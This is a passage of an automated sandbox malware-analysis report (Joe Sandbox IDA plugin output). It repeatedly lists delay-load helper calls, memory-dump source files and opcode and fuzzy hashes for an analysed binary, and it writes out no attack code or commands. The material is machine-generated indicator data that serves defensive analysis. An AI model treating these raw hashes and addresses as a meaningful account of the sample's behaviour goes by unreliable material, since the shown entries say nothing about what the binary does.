                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 4a7bcfe77112e58084627a7ac8afbd79c975f77439e0fe4c8322f06e394af278
                                                            • Instruction ID: f81365da1fd8bfeeaad71eaaa6ba2d8bab2ab79f48f15c3ba9da7ffb38eefbd3
                                                            • Opcode Fuzzy Hash: 4a7bcfe77112e58084627a7ac8afbd79c975f77439e0fe4c8322f06e394af278
                                                            • Instruction Fuzzy Hash: A8B092B225C801AC720451262817C3E0D4CFAC2B11330882AB809C00C19850A9054431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 5da0c1dcb5e6aaefdd9264a895eb87a5a355b34ed409781d088ce8c378eae771
                                                            • Instruction ID: 99932ceef9a20ec3c7d7d01e23fcf2d4d945cdeb5e12a743a1b919e03194f414
                                                            • Opcode Fuzzy Hash: 5da0c1dcb5e6aaefdd9264a895eb87a5a355b34ed409781d088ce8c378eae771
                                                            • Instruction Fuzzy Hash: 97B092B225C901AC624551152817C3E0D4CEAC2B11330892AB809C00C19850A9454431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050EAF9
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Ro
                                                            • API String ID: 1269201914-1492261280
                                                            • Opcode ID: 593b266668319c99d24f4da36d2030769880447477d6f9925dd016f8797e57f9
                                                            • Instruction ID: d0fcf8b7bbe9348d5472c33df765ef750b3cae981658e26f6258029d924a4254
                                                            • Opcode Fuzzy Hash: 593b266668319c99d24f4da36d2030769880447477d6f9925dd016f8797e57f9
                                                            • Instruction Fuzzy Hash: 37B0928729A552BCA204A244291FC3E0D09FAC1B91330882AF804840E2988019060431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: ca2600c530f79b8b61820d5a4f9b8228c6d7287380bba0aede2f1e3dd484e15c
                                                            • Instruction ID: b3d03ab7db7c6913a81a6c4d7cc44d953489ab74d97b9cb12d1be9e9c0053013
                                                            • Opcode Fuzzy Hash: ca2600c530f79b8b61820d5a4f9b8228c6d7287380bba0aede2f1e3dd484e15c
                                                            • Instruction Fuzzy Hash: 5DB092B225C801AC620451562917C3E0D8CEAC2B11330882AB809C00C19850A9064431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: 74587ca4c5cdd5e1754682ea36be6e79e8a115c07e0a40c8991618e6096f75e7
                                                            • Instruction ID: 2ba2f03672dfb3753b7eab67a92042ec9a97c6a9ba85592a087f793d5f020655
                                                            • Opcode Fuzzy Hash: 74587ca4c5cdd5e1754682ea36be6e79e8a115c07e0a40c8991618e6096f75e7
                                                            • Instruction Fuzzy Hash: 9AB092922586017CA20451086C1BC3E0D49EAC6B113308E2BB808C00C1A8402C490431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E51F
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: PDu<P
                                                            • API String ID: 1269201914-1790169076
                                                            • Opcode ID: 0ffbb9bebbfb31e0c7bf17a3a02f7bff41d444b3eeabdd8fc58ebc3e3f71107f
                                                            • Instruction ID: fc183e0288001211bbf50d4ed6cebe2b471c76b62859913a7123a73b4499a41b
                                                            • Opcode Fuzzy Hash: 0ffbb9bebbfb31e0c7bf17a3a02f7bff41d444b3eeabdd8fc58ebc3e3f71107f
                                                            • Instruction Fuzzy Hash: 47B012D32585017CB20411282C1FC3F0D0DFAC2F113308C3FF814C04C2B8401D090431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 7332fafafbe8362eeebf5e356949fe9ae1e519ffcdb2ae87d55225cd595f67f6
                                                            • Instruction ID: 7ae8ed3e8fabe16784eca67e15da073b8b8554c489213332516f19b27b174bc5
                                                            • Opcode Fuzzy Hash: 7332fafafbe8362eeebf5e356949fe9ae1e519ffcdb2ae87d55225cd595f67f6
                                                            • Instruction Fuzzy Hash: A0B012D22594117D720891783D1BC3F0D4DFBC1B113308D2FF808C10C1E8401C090431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 79c44328528fa5183ee08e86dd29a2bf3d41227a235b091e71178dc206862af5
                                                            • Instruction ID: 26fe7843cd3b40a4ea0759d00bb7c729765bf904c420bc5c6c3128a68d3596f7
                                                            • Opcode Fuzzy Hash: 79c44328528fa5183ee08e86dd29a2bf3d41227a235b091e71178dc206862af5
                                                            • Instruction Fuzzy Hash: ABB012E22595117C724891687D1BC3F0D5DFAC1B113308F2FF808C10C1EC402C490431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E580
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: FjunP
                                                            • API String ID: 1269201914-2738844368
                                                            • Opcode ID: 04eb1cafff0429958131841505b699718e61a5586aaf5cb756b70a6cfcc0b972
                                                            • Instruction ID: 309bfef4a22767a260b8977bf7ac7336dceee6ccb208530acdda810442f74f0b
                                                            • Opcode Fuzzy Hash: 04eb1cafff0429958131841505b699718e61a5586aaf5cb756b70a6cfcc0b972
                                                            • Instruction Fuzzy Hash: 75B012E22594117C720891687E1BC3F0D5DFAC1B113308F2FF808C10C1EC401D1A0431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 57954297aa0625ff6f80cba51a2013789c320ec9906a229deefe1653219c4892
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 57954297aa0625ff6f80cba51a2013789c320ec9906a229deefe1653219c4892
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 797d170f38f984ea00eafe81161ec4f84eb96718973fb5c20c2bdf9d4850e1fa
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 797d170f38f984ea00eafe81161ec4f84eb96718973fb5c20c2bdf9d4850e1fa
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 59918c126c881f1932565d43fa9b16de05ad10a258bbd6b20489360f987ae6b6
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 59918c126c881f1932565d43fa9b16de05ad10a258bbd6b20489360f987ae6b6
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: c2bad6e49a20b8b6bc44571f78cc55f593309c1e590808eb2ed62a015e00c904
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: c2bad6e49a20b8b6bc44571f78cc55f593309c1e590808eb2ed62a015e00c904
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 3dfaecaf18a28eb17f0173f69e124787ad9d237b6fe876bde11239c5132f021a
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 3dfaecaf18a28eb17f0173f69e124787ad9d237b6fe876bde11239c5132f021a
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: P
                                                            • API String ID: 1269201914-4136404734
                                                            • Opcode ID: 5dc3ddb33b93f993afb52ea18d9a3e50c35ff66a4a734f0f6407923471e99444
                                                            • Instruction ID: d79b85e88b80c3dcf65ec97c1a9d3cf3ce8d4d0ef3bef9206761882a141c6ae8
                                                            • Opcode Fuzzy Hash: 5dc3ddb33b93f993afb52ea18d9a3e50c35ff66a4a734f0f6407923471e99444
                                                            • Instruction Fuzzy Hash: 2FA001F62AD952BCB11962526D1BC3F0E1DEAC6B613318D2EF816C44C2A8A0A8465871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E1E3
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
